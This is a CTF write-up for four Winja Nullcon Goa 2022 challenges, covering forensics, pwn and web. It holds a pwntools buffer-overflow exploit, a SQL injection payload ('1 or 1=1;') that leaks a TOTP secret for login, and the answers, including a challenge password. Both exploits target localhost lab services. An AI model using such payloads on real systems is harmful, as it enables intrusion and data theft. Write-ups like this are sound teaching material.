Blogs and Writeups
Subscribe
CTF Writeups

Winja - Nullcon Goa 2022

Winja - Nullcon Goa 2022

CTF Writeup

Flag Regex: flag{.*?}

Space Relays

Description: Two random people who spoke something important and I was able to eavesdrop their communication through relay satellites. Help me to decode it.
Points: 200
Difficulty Level: EASY
Category: Forensics

Solution:

  1. The captured packets look like TCP communication with message
  2. First 14 message packets does not have anything important and after that each message packet says whether its Match or not Match
  3. If not match then it will have hash which is md5
  4. Decoding and assembling all the packets will give flag.
from scapy.all import *
from binascii import unhexlify
import hashlib

packets = PcapReader("chall.pcap")
md5_hex = {hashlib.md5(bytes('{:02x}'.format(x),"ascii")).hexdigest():'{:02x}'.format(x) for x in range(0,256)}
bytes_str = ""

for i,packet in enumerate(packets):
    data = bytes(packet.payload).decode("latin-1")
    if i<=14 or "Match" in data or packet["TCP"].flags == "A":
        continue

    hex_char = ""
    if "Mismatch" in data:
        hex_char = md5_hex[data[-32:]]
        bytes_str = bytes_str[:-2] 
    else:
        hex_char = data[-2:]
    
    bytes_str += hex_char

print("Writing to image")
with open("image.png","wb") as f:
    f.write(unhexlify(bytes_str))

FreeFall

Description: The highest jump in freefall is 40km, I don't think you so you need to jump that much. But calculate before you jump.
Points: 100
Difficulty Level: EASY
Category: PWN

  1. Overflow the input to invoke win method
from pwn import *

# r = process('./bof1')
r = remote("localhost",18967)
elf = ELF('./bof1')

payload = b'A'*0x20+p64(elf.got['puts']+0x20)+p64(elf.symbols['win'])

print(r.recvline())
r.sendline(payload)
try:
	print(r.recvline())
except:
	pass

r.interactive()
r.close()

Space-time

Description: Time is precious, In space its calculate based on speed of light but in earth its different. Can you help recalculating the frequence of time on earth based on seconds
Points: 300
Difficulty Level: MEDIUM
Category: Web

  1. Can try sql injection to retrive all the information
  2. find out the secret key of TOTP and login to retrieve the information
import requests, json
import pyotp

response = requests.post("http://localhost:8080/",data={"action":"get","id":"1 or 1=1;"})
print(response.status_code)
data = json.loads(response.text)
print(data)

totp = pyotp.TOTP(data[0][1]).now()
response = requests.post("http://localhost:8080/",data={"action":"verify","totp":totp})
if "flag" in response.text:
    print(response.text)

Deep Space

Description: While searching for signs of first-generation stars at an altitude of 36.5 km, they heard this unusual and unexpected radio hum coming from deep space. As you can tell, no explanation has been found 14 years later. This could be that much harder to find, check where is sound originating from.
Points: 300
Difficulty Level: MEDIUM
Category: Forensics

  1. Deepsound
  2. Get the password: ThinKlIk3h4CkEr
  3. Get XLSM from secret file
  4. Unprotect Macro
  5. convert hex to flag

Read next